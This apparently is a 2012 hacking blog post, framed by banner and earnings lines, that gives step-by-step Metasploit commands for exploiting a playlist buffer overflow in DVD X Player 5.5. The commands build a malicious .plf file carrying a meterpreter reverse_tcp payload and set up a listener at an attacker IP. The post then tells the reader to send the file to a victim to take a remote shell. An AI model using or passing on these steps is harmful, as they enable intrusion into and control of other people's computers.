Banner 480

Rabu, 16 Mei 2012

Hacking Windows PC with DVD X Player 5.5 .plf PlayList Buffer Overflow

This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard. By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract a filename out of the string, and then copy it on the stack without any proper bounds checking, which casues a buffer overflow, and results arbitrary code execution under the context of the user. This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7.

Exploit Targets
DVD X Player 5.5 Pro
Windows XP SP 2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/fileformat/dvdx_plf_bof
Msf exploit (dvdx_plf_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (dvdx_plf_bof)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (dvdx_plf_bof)>exploit


After we successfully generate the malicious ZIP File, it will stored on your local computer
/root/.msf4/local/msf.plf


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit

Now send your msf.plf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Banner 480 bawah




Your Clicks! Your Earning!